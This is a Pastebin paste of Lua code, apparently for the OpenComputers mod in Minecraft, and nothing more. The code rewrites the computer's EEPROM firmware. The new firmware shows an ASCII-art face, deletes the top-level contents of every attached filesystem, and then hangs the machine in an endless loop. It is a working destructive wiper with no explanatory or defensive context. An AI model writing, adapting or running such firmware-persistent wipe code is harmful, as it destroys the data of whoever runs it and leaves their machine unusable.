Advertisement
QuicksilverBoy

Untitled

Oct 31st, 2017
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. component = require("component")
  2. computer = require("computer")
  3.  
  4. print("УДАЛЕНИЕ...")
  5.  
  6. component.eeprom.set([[
  7.   listFS = component.list("filesystem")
  8.  
  9.   gpu = component.proxy(component.list("gpu")())
  10.   pic = {
  11.     "                                         ..,.`                                    ",
  12.     "                               .;;;;:::::;;;:                                   ",
  13.     "                             ;;::::::::::::::;;`                                ",
  14.     "                           :;::::::::::::::::::;,                               ",
  15.     "                         `;::::;::::::::::::;:::;.                              ",
  16.     "                         ;:::::;:::::::::::;:::::,                              ",
  17.     "               .,:;::.  :::::;;::;;;;:::;;;;:::::.  `.`                         ",
  18.     "           `;;:::::::::;::;:::;;:::::::::::::;;:;;::::::;;;;;;;;;;;;:.          ",
  19.     "         ,;:::::::::::::::::;;:::::::::::::::::;:::::;;:::::::::::::::;;;`      ",
  20.     "       `;::::::,,,,,::::::::;:::::::::::::::::::;::;:::::::::::::::::::::;;.    ",
  21.     "      :;:::::,.````.,::::::;:::::::::::::::::::::;:::::::::::::::::::::::::;;   ",
  22.     "     :;::::,,```````.,:::::;:::::::::::::::::::::::::::::::::::::::::::::::::;` ",
  23.     "    ,;::::,..`.``````,::::,;:::::::::::::::::::::::::::::::::::::::::::::::::;; ",
  24.     "   `;:::::,.`..``````.:,,...;:::::::::::::::::;;;;::..,,,;;;;:::::::::::::::::;,",
  25.     "   :;:;::,.``..``````.,.`````;:::::::::::::;:.``````.,.``````,;;::::::::::::::;:",
  26.     "   ;::::;,.``..```````````````.;:::::::::;.``````````````````...;;::::::::::::;.",
  27.     "  `;:::::,.``..``````````````````:;::::;.````````````````````..``:;::::::::::;; ",
  28.     "   ;:::::,.```.`'.``````````````````.;'.``````````````````.'`.```.:;:::::::::;` ",
  29.     "   :;:::::,``:.`,@..@#;+@@:``````````````````````:@@+;#@..@,..:``.`;::::::::;,  ",
  30.     "   `;:::::,.`.#;`.@ `'''#@';+``````````````````+;'@#'''` @.`;#.`.. ;:::::::;.   ",
  31.     "     ;::::::,:``,# `:;@@@.   @.``````````````.@   .@@@;:` #,``:,` ,;::::::;`    ",
  32.     "      .;:::::,.+@  .,@@@@`   `@``````````````@`   `@@@@,.  @+.`  `;:::::;:      ",
  33.     "       ,;:::::,.` `.+@@@@#    ;'````````````';    #@@@@+.` `..   ;:::::;`   ::  ",
  34.     "    `;;:::::::,,` `.#@@@@@@@;;##````````````##;;@@@@@@@#.` `..  ,;:::;` ,;;;;   ",
  35.     "   .;:::::::::,,` `.+@@@' '@@@@#````````````#@@@@' '@@@+.` `,.  ::::::::::;,    ",
  36.     "  .;:::::::::::;;  `.@@@@@@@@@@'````````````'@@@@@@@@@@.`  ;;`  :;::::::;,      ",
  37.     "  :;:::::::::::'#;  `,@@@@@@@@:,````....````,:@@@@@@@@,`  ;#;    .;;;:`         ",
  38.     "  ;:::::::::::::.;: `..:@@@@;...````````````...;@@@@:..` :;.                    ",
  39.     "  ;;::::::::::::,,.``..``````.````..`````..```.``````..``.,`                    ",
  40.     "  :;::::::::::::::,.`````````````.`````````..```````````.,`                     ",
  41.     "  .;::;::::::::::::,,.```````````...`````...```````````,,                       ",
  42.     "   ,;:::::::;:::::::,.,``````````..  ```  ..`````````.,`                        ",
  43.     "    ,;::::::;::::::::::,,.````````..     ..````````,,`                          ",
  44.     "      ;;:::::;::::::::::::,,.```````.,,,.``````..,.                             ",
  45.     "        ,;;::::;;:::::;;.   .,,,...``````...,,,`                                ",
  46.     "           `,;::::::::::::;;,.````........````,.                                ",
  47.     "           :;;:::::::::::::::;:```````````````.. `....`                         ",
  48.     "         `;;:::::::::::::::::::;.`````````````.,::::::::;;;.                    ",
  49.     "          :;::::::::;:::::::::::;.````````````.,,,::::::::::;;`                 ",
  50.   }
  51.  
  52.   for y = 11, #pic do
  53.     gpu.set(1, y, pic[y])
  54.   end
  55.  
  56.   for i, v in pairs(listFS) do
  57.     local disk = component.proxy(i)
  58.     if disk.list("/").n >= 1 then
  59.       local core = disk.list("/")
  60.       for i = 1, #core do
  61.         disk.remove(core[i])
  62.       end
  63.     end
  64.   end
  65.  
  66.   while true do
  67.     computer.pullSignal(60)
  68.   end
  69. ]])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement